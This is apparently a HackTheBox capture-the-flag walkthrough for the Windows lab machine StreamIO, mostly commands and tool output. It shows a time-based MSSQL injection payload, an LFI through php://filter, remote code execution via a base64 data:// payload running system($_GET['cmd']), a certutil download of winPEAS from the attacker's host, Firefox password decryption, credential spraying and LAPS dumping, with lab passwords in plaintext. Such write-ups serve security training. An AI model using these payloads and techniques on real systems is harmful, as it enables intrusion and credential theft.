StreamIO- [HTB]

Cover Image for StreamIO- [HTB]
Marmeus
Marmeus

Table of Contents

    Introduction

    StemIO is a medium machine from HackTheBox, where the attacker will have to perform some Time-based SQLi to obtain some credentials for getting access to an admin panel. Then, it will have to perform a parameter enumeration, finding an LFI in a debug parameter, which can be used to retrieve the web's source code. After that, it will have to analyse the source code to find an RCE. Subsequently, it will have to dump a Firefox database to obtain some credentials. Finally, it will have to use the obtained credentials to obtain, through LAPS, the admin password.

    Enumeration

    As always, let's start finding all opened ports in the machine with Nmap.

    kali@kali:~/Documents/HTB/StreamIO$ sudo nmap -v -sS -p- -n -T4 -oN AllPorts.txt 10.10.11.158
    Nmap scan report for 10.10.11.158
    Host is up (0.11s latency).
    Not shown: 65515 filtered tcp ports (no-response)
    PORT      STATE SERVICE
    53/tcp    open  domain
    80/tcp    open  http
    88/tcp    open  kerberos-sec
    135/tcp   open  msrpc
    139/tcp   open  netbios-ssn
    389/tcp   open  ldap
    443/tcp   open  https
    445/tcp   open  microsoft-ds
    464/tcp   open  kpasswd5
    593/tcp   open  http-rpc-epmap
    636/tcp   open  ldapssl
    3268/tcp  open  globalcatLDAP
    3269/tcp  open  globalcatLDAPssl
    5985/tcp  open  wsman
    9389/tcp  open  adws
    49667/tcp open  unknown
    49673/tcp open  unknown
    49674/tcp open  unknown
    49704/tcp open  unknown
    53797/tcp open  unknown

    Then, we continue with a deeper scan of every opened port, getting more information about each service.

    kali@kali:~/Documents/HTB/StreamIO$ sudo nmap -sC -sV -n -T4 -oN PortsDepth.txt -p 53,80,88,135,139,389,443,445,464,593,636,3268,3269,5985,9389,49667,49673,49674,49704,53797 10.10.11.158
    Nmap scan report for 10.10.11.158
    Host is up (0.19s latency).
    
    PORT      STATE SERVICE       VERSION
    53/tcp    open  domain        Simple DNS Plus
    80/tcp    open  http          Microsoft IIS httpd 10.0
    | http-methods: 
    |_  Potentially risky methods: TRACE
    |_http-server-header: Microsoft-IIS/10.0
    |_http-title: IIS Windows Server
    88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-07-14 02:22:27Z)
    135/tcp   open  msrpc         Microsoft Windows RPC
    139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
    389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
    443/tcp   open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
    | tls-alpn: 
    |_  http/1.1
    | ssl-cert: Subject: commonName=streamIO/countryName=EU
    | Subject Alternative Name: DNS:streamIO.htb, DNS:watch.streamIO.htb
    | Not valid before: 2022-02-22T07:03:28
    |_Not valid after:  2022-03-24T07:03:28
    |_ssl-date: 2022-07-14T02:23:58+00:00; +7h00m00s from scanner time.
    |_http-server-header: Microsoft-HTTPAPI/2.0
    |_http-title: Not Found
    445/tcp   open  microsoft-ds?
    464/tcp   open  kpasswd5?
    593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
    636/tcp   open  tcpwrapped
    3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
    3269/tcp  open  tcpwrapped
    5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
    |_http-title: Not Found
    |_http-server-header: Microsoft-HTTPAPI/2.0
    [...]
    Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
    
    Host script results:
    | smb2-security-mode: 
    |   3.1.1: 
    |_    Message signing enabled and required
    | smb2-time: 
    |   date: 2022-07-14T02:23:18
    |_  start_date: N/A
    |_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m58s
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    # Nmap done at Wed Jul 13 15:24:02 2022 -- 1 IP address (1 host up) scanned in 103.23 seconds

    Thanks to Nmap, two domains have been found.

    kali@kali:~/Documents/HTB/StreamIO$ echo 10.10.11.158 streamIO.htb watch.streamIO.htb | sudo tee -a /etc/hosts

    At port 80, there is only a default IIS Express page, but at port 443 appears a web page about online movie streaming.

    Streamio Online Movie steaming platform

    Enumerating the web page appears an admin page but it is forbidden.

    kali@kali:~/Documents/HTB/StreamIO$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e /,.asp,.php,.html,.txt -of md -o ffuz.txt -t 60 -u https://streamio.htb/FUZZ -fs 13497
    [...]
    images                  [Status: 301, Size: 151, Words: 9, Lines: 2]
    images/                 [Status: 403, Size: 1233, Words: 73, Lines: 30]
    contact.php             [Status: 200, Size: 6434, Words: 2010, Lines: 206]
    about.php               [Status: 200, Size: 7825, Words: 2228, Lines: 231]
    login.php               [Status: 200, Size: 4145, Words: 796, Lines: 111]
    register.php            [Status: 200, Size: 4500, Words: 905, Lines: 121]
    Images                  [Status: 301, Size: 151, Words: 9, Lines: 2]
    Images/                 [Status: 403, Size: 1233, Words: 73, Lines: 30]
    admin                   [Status: 301, Size: 150, Words: 9, Lines: 2]
    admin/                  [Status: 403, Size: 18, Words: 1, Lines: 1]
    css                     [Status: 301, Size: 148, Words: 9, Lines: 2]
    css/                    [Status: 403, Size: 1233, Words: 73, Lines: 30]
    Contact.php             [Status: 200, Size: 6434, Words: 2010, Lines: 206]
    About.php               [Status: 200, Size: 7825, Words: 2228, Lines: 231]
    Login.php               [Status: 200, Size: 4145, Words: 796, Lines: 111]

    Inside the login panel, it is possible to sign up users despite not being allowed to log in later.

    Login panel

    Exploitation 1

    Because the web server is an IIS Windows Server, there is a high chance that the database management system used in the web page is MSSQL. So trying different payloads from PayloadAllTheThings, it is possible to confirm that the database is MSSQL and vulnerable to Time-based attacks.

    kali@kali:~/Documents/HTB/StreamIO$ time curl -s -k -X POST --data "username=';waitfor delay '0:0:10'--&password=1234" https://streamio.htb/login.php 1>/dev/null
    
    real    0m10.694s
    user    0m0.015s
    sys     0m0.004s
    

    This can also be confirmed with SQLMap.

    kali@kali:~/Documents/HTB/StreamIO$ sqlmap -u https://streamio.htb/login.php --method POST --data 'username=admin&password=1234' -p username --batch --level
     5 --risk 3 --technique=t --dbms=MSSQL
    [...]
     POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
    sqlmap identified the following injection point(s) with a total of 62 HTTP(s) requests:
    ---
    Parameter: username (POST)
        Type: time-based blind
        Title: Microsoft SQL Server/Sybase time-based blind (IF)
        Payload: username=admin' WAITFOR DELAY '0:0:5'-- xNbM&password=1234

    Now, let's obtain the database information.

    Note: This process takes a VERY VERY long time.

    sqlmap -u https://streamio.htb/login.php --method POST --data 'username=admin&password=1234' -p username --batch --level 5 --risk 3 --technique=t --dbms=MSSQL --dbs
    [...]
    available databases [5]:
    [*] model
    [*] msdb
    [*] STREAMIO
    [*] streamio_backup
    [*] tempdb
    
    sqlmap -u https://streamio.htb/login.php --method POST --data 'username=admin&password=1234' -p username --batch --level 5 --risk 3 --technique=t --dbms=MSSQL -D STREAMIO --tables
    [16:39:36] [INFO] retrieved: dbo.users
    Database: STREAMIO
    [2 tables]
    +--------+
    | movies |
    | users  |
    +--------+
    
    sqlmap -u https://streamio.htb/login.php --method POST --data 'username=admin&password=1234' -p username --batch --level 5 --risk 3 --technique=t --dbms=MSSQL -D STREAMIO -T users --dump
    
    +-------+----------------+----------------------------------------------------+----------+
    | id    | username       | password                                           | is_staff |
    +-------+----------------+----------------------------------------------------+----------+
    | 3     | James          | c660060492d9edcaa8332d89c99c9239                   | 1        |
    | 4     | Theodore       | 925e5408ecb67aea449373d668b7359e                   | 1        |
    | 5     | Samantha       | 083ffae904143c4796e464dac33c1f7d                   | 1        |
    | 6     | Lauren         | 08344b85b329d7efd611b7a7743e8a09                   | 1        |
    | 7     | William        | d62be0dc82071bccc1322d64ec5b6c51                   | 1        |
    | 8     | Sabrina        | f87d3c0d6c8fd686aacc6627f1f493a5                   | 1        |
    | 9     | Robert         | f03b910e2bd0313a23fdd7575f34a694                   | 1        |
    | 10    | Thane          | 3577c47eb1e12c8ba021611e1280753c                   | 1        |
    | 11    | Carmon         | 35394484d89fcfdb3c5e447fe749d213                   | 1        |
    | 12    | Barry          | 54c88b2dbd7b1a84012fabc1l4c73415                   | 1        |
    | 13    | Oliver         | fd78db29173a5cf701bd69027cb9bf6b                   | 1        |
    | 14    | Michelle       | b83439b16f844bd6ffe35c02fe21b3c0                   | 1        |
    | 15    | Gloria         | 0cfaaaafb559f081df2befbe66686de0                   | 1        |
    | 16    | Victoria       | b22abb47a02b52d5dfa27fb0b534f693                   | 1        |
    | 17    | Alexendra      | 1c2b3d8270321140e5153f6637d3ee53                   | 1        |
    | 18    | Baxter         | 22ee218331afd081b0dcd8115284bae3                   | 1        |
    | 19    | Clara          | ef8f3d30a856cf166fb8215aca93e9ff                   | 1        |
    | 20    | Barbra         | 3961548825e3e21df5646cafe11c6c76                   | 1        |
    | 21    | Lenord         | ee0b8a0937abd60c2882eacb2f8dc49f                   | 1        |
    | 22    | Austin         | 0049ac57646627b8d7aeaccf8b6a936f                   | 1        |
    | 23    | Garfield       | 8097cedd612cc37c29db152b6e9edbd3                   | 1        |
    | 24    | Juliette       | 6dca87740abb64edfa36d170f0d5450d                   | 1        |
    | 25    | Victor         | bf55e15b119860a6e6b5a164377da719                   | 1        |
    | 26    | Lucifer        | 7df45a9e3de3863807c026ba48e55fb3                   | 1        |
    | 27    | Bruno          | 2a4e2cf22dd8fcb45adcb91be1e22ae8                   | 1        |
    | 28    | Diablo         | ec33265e5fc8c2f1b0c137bb7b3632b5                   | 1        |
    | 29    | Robin          | dc332fb5576e9631c9dae83f194f8e70                   | 1        |
    | 30    | Stan           | 384463526d288edcc95fc3701e523bc7                   | 1        |
    | 31    | yoshihide      | b779ba15cedfd22a023c4d8bcf5f2332                   | 1        |
    | 33    | admin          | 665a50ac9eaa781e4f7f04199db97a11                   | 0        |
    +-------+----------------+----------------------------------------------------+----------+
    

    To crack most of the hashes, the online tool Crackstation can be used.

    Of all the users, only it is possible to log in with the user "yoshihide" with its password 66boysandgirls...

    Now, it is possible to access the /admin panel.

    Admin panel

    Then, a new parameter can be obtained after some parameter enumeration.

    kali@kali:~/Documents/HTB/StreamIO$ ffuf -H "Cookie: PHPSESSID=gkr70luj9e3b0hcefg82i0jbim" -w /usr/share/wordlists/SecLists/Discovery/Web-Content/burp-parameter-names.txt -of md -o ffuz.txt -t 60 -u https://streamio.htb/admin/?FUZZ= -fs 1678
    [...]
    user                    [Status: 200, Size: 2073, Words: 146, Lines: 63]
    debug                   [Status: 200, Size: 1712, Words: 90, Lines: 50]
    staff                   [Status: 200, Size: 12484, Words: 1784, Lines: 399]
    movie                   [Status: 200, Size: 320235, Words: 15986, Lines: 10791]

    Also, the debug parameter seems to be vulnerable to LFI.

    kali@kali:~/Documents/HTB/StreamIO$ ffuf -H "Cookie: PHPSESSID=gkr70luj9e3b0hcefg82i0jbim" -w /usr/share/wordlists/SecLists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt -of md -o ffuz.txt -t 60 -u https://streamio.htb/admin/?debug=FUZZ -fs 1712
    [...]
    C:/Windows/win.ini      [Status: 200, Size: 1804, Words: 95, Lines: 57]
    C:/WINDOWS/System32/drivers/etc/hosts [Status: 200, Size: 2577, Words: 262, Lines: 71]
    C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml  [Status: 200, Size: 46280, Words: 8867, Lines: 719]

    To obtain the PHP code of the web page, it is necessary to use PHP wrappers and then decode it.

    Exploitation 2

    Some credentials can be obtained, but they are not used by any user.

    # https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=index.php
    <?php
    define('included',true);
    session_start();
    if(!isset($_SESSION['admin']))
    {
    	header('HTTP/1.1 403 Forbidden');
    	die("<h1>FORBIDDEN</h1>");
    }
    $connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890');
    $handle = sqlsrv_connect('(local)',$connection);
    [...]
    
    # https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=../login.php
    [...]
    <?php
    $connection = array("Database"=>"STREAMIO" , "UID" => "db_user", "PWD" => 'B1@hB1@hB1@h');
    $handle = sqlsrv_connect('(local)',$connection);
    [...]

    Enumerating the /admin/ directory appears a new file.

    kali@kali:~/Documents/HTB/StreamIO$ ffuf -H "Cookie: PHPSESSID=gkr70luj9e3b0hcefg82i0jbim" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e /,.php -of md -o ffuz_admin.txt -t 60 -u https://streamio.htb/admin/FUZZ -fs 94105,1678
    
    [...]
    master.php              [Status: 200, Size: 58, Words: 5, Lines: 2]
    [...]

    Using the PHP wrapper again, it is possible to obtain its source code.

    # https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=master.php
    [<h1>Movie managment</h1>
    <?php
    if(!defined('included'))
    	die("Only accessable through includes");
    [...]
    <?php
    if(isset($_POST['include']))
    {
    if($_POST['include'] !== "index.php" ) 
    eval(file_get_contents($_POST['include']));
    else
    echo(" ---- ERROR ---- ");
    }
    ?>

    Analysing the code, the following conclusions can be obtained. The application checks if the included variable is set, stopping the execution if it is not. Then, at the bottom of the file, there is a POST variable named include which will retrieve the contents of any file passed as an argument.

    Exploitation 3

    Hence, using the LFI vulnerability, the file master.php can be included in the index.php file, which defines the included variable to true, allowing to obtain the contents of any arbitrary file.

    Furthermore, to avoid hosting a web shell, we can use another PHP wrapper to obtain code execution.

    curl -sk -X POST -H 'Content-Type: application/x-www-form-urlencoded' -b 'PHPSESSID=gkr70luj9e3b0hcefg82i0jbim' --data-binary "include=data://text/plain;base64,c3lzdGVtKCRfR0VUWydjbWQnXSk7" "https://streamio.htb/admin/?debug=master.php&cmd=whoami
    [...]
    streamio\yoshihide

    Note: To obtain a proper reverse shell, you can URL encode the PowerShell base64 from revshell.com.

    Now, it is possible to access the database, enumerating inside the streamio_backup.

    PS C:\inetpub\streamio.htb\admin> sqlcmd -S localhost -U db_admin -P 'B1@hx31234567890' -Q "SELECT name FROM master.dbo.sysdatabases"
    
    name
    ------------------
    master
    tempdb
    model
    msdb
    STREAMIO
    streamio_backup 
    
    # Tables
    sqlcmd -S localhost -U db_admin -P 'B1@hx31234567890' -Q "SELECT * FROM streamio_backup.INFORMATION_SCHEMA.TABLES
    TABLE_CATALOG   TABLE_SCHEMA TABLE_NAME TABLE_TYPE
    --------------- ------------ ---------- ---------
    streamio_backup   dbo           movies  BASE TABLE
    streamio_backup   dbo           users   BASE TABLE
    
    # Users
    sqlcmd -S localhost -U db_admin -P 'B1@hx31234567890' -Q "use streamio_backup; SELECT * FROM users"
    Changed database context to 'streamio_backup'.
    id          username                                           password                                          
    ----------- -------------------------------------------------- --------------------------------------------------
              1 nikk37                                             389d14cb8e4e9b94b137deb1caf0612a                  
              2 yoshihide                                          b779ba15cedfd22a023c4d8bcf5f2332                  
              3 James                                              c660060492d9edcaa8332d89c99c9239                  
              4 Theodore                                           925e5408ecb67aea449373d668b7359e                  
              5 Samantha                                           083ffae904143c4796e464dac33c1f7d                  
              6 Lauren                                             08344b85b329d7efd611b7a7743e8a09                  
              7 William                                            d62be0dc82071bccc1322d64ec5b6c51                  
              8 Sabrina                                            f87d3c0d6c8fd686aacc6627f1f493a5

    After, cracking the hashes, it is possible to obtain nikk37's password, getting access to the machine through winrm and obtaining the user flag.

    kali@kali:~/UTILS$ evil-winrm -i streamio.htb -u nikk37 -p 'get_dem_girls2@yahoo.com' 
    *Evil-WinRM* PS C:\Users\nikk37\Documents> type ..\Desktop\user.txt
    [CENSORED]

    Privilege Escalation 1

    Running Winpeas as nikk37, it is possible to find a Firefox database which might contain some credentials.

    *Evil-WinRM* PS C:\Users\nikk37\Documents> certutil -urlcache -f http://10.10.14.116/winPEASx64.exe winPEASx64.exe
    *Evil-WinRM* PS C:\Users\nikk37\Documents> .\winPEASx64.exe
    [...]
    +------ Looking for Firefox DBs                                                                     
    | https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#browsers-history               
        Firefox credentials file exists at C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\key4.db
    [...]

    The tool firepwd can be used to decrypt the password from the Firefox database, but the files key4.d and logins.json must be downloaded.

    *Evil-WinRM* PS C:\Users\nikk37\Documents> download C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\key4.d
    *Evil-WinRM* PS C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release> type logins.json
    {"nextId":5,"logins":[{"id":1,"hostname":"https://slack.streamio.htb","httpRealm":null,"formSubmitURL":"","usernameField":"","passwordField":"","encryptedUsername":"MDIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECG2cZGM1+s+hBAiQvduUzZPkCw==","encryptedPassword":"MEIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECKA5q3v2TxvuBBjtXIyW2UjOBvrg700JOU1yfrb0EnMRelw=","guid":"{9867a888-c468-4173-b2f4-329a1ec7fa60}","encType":1,"timeCreated":1645526456872,"timeLastUsed":1645526456872,"timePasswordChanged":1645526456872,"timesUsed":1},{"id":2,"hostname":"https://slack.streamio.htb","httpRealm":null,"formSubmitURL":"","usernameField":"","passwordField":"","encryptedUsername":"MDIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECDMUru7zbEb0BAiinvqXr8Trkg==","encryptedPassword":"MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECOXW0KzZftfWBBARYsMPvSrUwx8+QfJdxzT+","guid":"{739bd2a5-5fec-4e08-97d2-3c619bf02be2}","encType":1,"timeCreated":1645526470377,"timeLastUsed":1645526470377,"timePasswordChanged":1645526470377,"timesUsed":1},{"id":3,"hostname":"https://slack.streamio.htb","httpRealm":null,"formSubmitURL":"","usernameField":"","passwordField":"","encryptedUsername":"MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECPtpFUOBoOFABBDVCjdAdstUxzB6i9DCqvOw","encryptedPassword":"MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECCocciyfDsthBBDm3YSuhBsW3roo3l3zOUuF","guid":"{a98a87bc-86aa-489c-9227-d6579ab5148b}","encType":1,"timeCreated":1645526484137,"timeLastUsed":1645526484137,"timePasswordChanged":1645526484137,"timesUsed":1},{"id":4,"hostname":"https://slack.streamio.htb","httpRealm":null,"formSubmitURL":"","usernameField":"","passwordField":"","encryptedUsername":"MDIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECB1j+gQdXzIuBAgO0o/N3J2MrQ==","encryptedPassword":"MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECNt9zddW+/h7BBCBgoQVGaDQjF2IpeQEl/Td","guid":"{2be21548-7c50-42f0-8ef6-b33b1e77f150}","encType":1,"timeCreated":1645526511842,"timeLastUsed":1645526511842,"timePasswordChanged":1645526511842,"timesUsed":1}],"potentiallyVulnerablePasswords":[],"dismissedBreachAlertsByLoginGUID":{},"version":3}

    Once, the tool is executed the following passwords can be retrieved.

    decrypting login/password pairs
    https://slack.streamio.htb:b'admin',b'JDg0dd1s@d0p3cr3@t0r'
    https://slack.streamio.htb:b'nikk37',b'n1kk1sd0p3t00:)'
    https://slack.streamio.htb:b'yoshihide',b'paddpadd@12'
    https://slack.streamio.htb:b'JDgodd',b'password@12'

    Privilege Escalation 2

    Making some enumeration with the new obtained users, it is discovered that the password JDg0dd1s@d0p3cr3@t0r can be used for accessing through SMB or LDAP as the user JDgodd.

    kali@kali:/media/sf_2_VM_Shares/HTB/StreamIO$ crackmapexec smb streamio.htb -u machine_users.txt -p passwords.txt 
    [...] 
    SMB         streamio.htb    445    DC               [+] streamIO.htb\JDgodd:JDg0dd1s@d0p3cr3@t0r
    
    kali@kali:/media/sf_2_VM_Shares/HTB/StreamIO$ crackmapexec ldap streamio.htb -u 'JDgodd' -p'JDg0dd1s@d0p3cr3@t0r'SMB         [...]
    LDAP        streamio.htb    389    DC               [+] streamIO.htb\JDgodd:JDg0dd1s@d0p3cr3@t0r

    On SMB, there is not much that can be obtained.

    kali@kali:/media/sf_2_VM_Shares/HTB/StreamIO$ smbmap -u JDgodd -p 'JDg0dd1s@d0p3cr3@t0r' -H streamio.htb
    [+] IP: streamio.htb:445        Name: unknown                                           
            Disk                                                    Permissions     Comment
            ----                                                    -----------     -------
            ADMIN$                                                  NO ACCESS       Remote Admin
            C$                                                      NO ACCESS       Default share
            IPC$                                                    READ ONLY       Remote IPC
            NETLOGON                                                READ ONLY       Logon server share 
            SYSVOL                                                  READ ONLY       Logon server share
    

    Nonetheless, the DC's LAPS password can be obtained using LAPSDumper.

    kali@kali:/tmp/LAPSDumper$ python laps.py -u JDgodd -p JDg0dd1s@d0p3cr3@t0r -d streamio.htb
    LAPS Dumper - Running at 08-01-2022 18:02:19
    DC s0u@e-(.QcyCkr

    Now, it is possible to access the machine as Administrator.

    kali@kali:/tmp/LAPSDumper$ evil-winrm -i streamio.htb -u Administrator -p 's0u@e-(.QcyCkr'
    *Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Martin\Desktop\root.txt
    [CENSORED]